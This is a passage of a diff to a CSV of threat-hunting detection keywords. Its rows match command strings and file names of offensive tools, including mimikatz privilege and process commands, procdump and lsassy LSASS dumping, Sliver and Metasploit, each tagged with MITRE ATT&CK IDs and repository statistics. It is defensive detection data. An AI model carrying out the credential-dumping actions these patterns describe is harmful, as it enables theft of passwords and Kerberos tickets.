keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::debug*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::driver*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::id*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::name*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::restore*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::security*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::sysenv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*privilege::tcb*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Privileged Accounts - Layers Analysis.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Final Report.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD 
Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Irregular Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" 
@@ -15142,39 +15310,39 @@ "*Privilegerx86.exe*","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","117","25","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*PrivKit32*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivKit-main*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" +"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" 
+"*Probable-Wordlists*","offensive_tool_keyword","Probable-Wordlists","real password lists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Exploitation tools","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*procdump* lsass.exe *.dmp*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" "*procdump.exe*lsass*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1003.001","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*procdump/dump_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*procdump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*procdump_embedded*","offensive_tool_keyword","lsassy","Extract 
credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*procdump_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*process::exports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::imports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::runp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*process_herpaderping*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*procdump/dump_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*procdump_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*procdump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*procdump_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*process::exports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::imports*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::resume*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::run*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::runp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::start*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*process::stop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
